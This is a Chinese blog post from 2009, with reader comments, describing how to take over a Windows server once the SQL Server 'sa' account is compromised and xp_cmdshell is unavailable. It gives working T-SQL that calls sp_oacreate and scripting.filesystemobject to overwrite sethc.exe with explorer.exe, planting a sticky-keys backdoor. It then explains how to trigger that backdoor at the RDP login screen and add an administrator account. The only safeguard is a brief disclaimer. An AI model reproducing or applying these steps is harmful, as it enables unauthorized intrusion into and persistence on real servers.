方向比努力重要,能力比知识重要,健康比成绩重要,生活比文凭重要,情商比智商重要!有了sa但无xp_cmdshell ,怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块,反正我遇到好多次了。在用exec sp_oacreate ‘wscript.shell’也没办法的情况下。。可用此方法
(很多服务器都把 ‘wscript.shell’给删了。)
看到既然能用sp_oacreate,sp_oamethod来弄 ‘wscript.shell’或者scripting.filesystemobject
网上看到的文章都只有几个用法就是 ‘wscript.shell’执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制,删除文件吧。。
上网找了些资料,得到下面方法:
复制文件:
1 2 3 4 5 6 7 | declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'; declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; |
成功后3389登陆按五次shift键。成功进入服务器。一直向上点“我的电脑”右键“管理” 用户管理直接加用户。
此法随无技术可言,希望对一些人有点用,请勿用于恶意入侵范围。
星期一, 二月 8, 2010 at 17:40
路过,看不明白
星期三, 十二月 9, 2009 at 21:18
学习一下,技术含量太高了,呵呵
星期三, 十二月 9, 2009 at 18:21
又见松松
星期三, 十二月 9, 2009 at 10:42
又遇到高人了
星期三, 十二月 9, 2009 at 4:03
同行? 嘿,有点技术含量…
星期二, 十二月 8, 2009 at 23:25
额!不懂,路过……
星期二, 十二月 8, 2009 at 19:21
不懂,路过下…
星期二, 十二月 8, 2009 at 14:48
我记得以前貌似有个黑客界的大牛说过:有了sa,再拿不到管理员权限那就是菜鸟!
不过后来还就真的见过一个大牛没有拿到管理员权限,原因就是启动SQL Server的账户是属于users组的。所以Xp_cmdshell也不是万能的哈
星期二, 十二月 8, 2009 at 9:06
俺可是看不懂了。
星期二, 十二月 8, 2009 at 8:32
呵呵 研究下 还真不大懂
星期二, 十二月 8, 2009 at 7:43
看不懂在说什么
星期一, 十二月 7, 2009 at 23:44
我还没出现过此情况,貌似以后能用的上
星期一, 十二月 7, 2009 at 21:56
原来按五次就可以了,才知道,
星期一, 十二月 7, 2009 at 21:10
我也做过这个笔记.放在某TXT里呢.
星期一, 十二月 7, 2009 at 20:20
完全搞不懂在说什么。。。我承认我是小白
星期一, 十二月 7, 2009 at 21:32
哎 一样
星期一, 十二月 7, 2009 at 18:25
没折腾这个,所以一头雾水
星期一, 十二月 7, 2009 at 16:04
学习中了…………
星期一, 十二月 7, 2009 at 14:42
学习了,好帖难求
星期一, 十二月 7, 2009 at 14:30
我又来看你了。支持。
星期一, 十二月 7, 2009 at 1:06
技术贴,学习
星期天, 十二月 6, 2009 at 18:13
可以将明白点吗?没看懂
星期天, 十二月 6, 2009 at 19:59
很清晰了
星期天, 十二月 6, 2009 at 14:17
没看明白的飘过